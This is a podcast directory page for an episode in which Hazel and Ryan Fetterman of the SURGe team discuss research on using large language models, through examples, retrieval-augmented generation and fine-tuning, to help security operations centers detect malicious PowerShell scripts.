
Sign up to save your podcasts
Or
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
4.9
1313 ratings
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
1,986 Listeners
364 Listeners
639 Listeners
370 Listeners
6,022 Listeners
1,018 Listeners
318 Listeners
406 Listeners
7,951 Listeners
172 Listeners
189 Listeners
316 Listeners
77 Listeners
129 Listeners
43 Listeners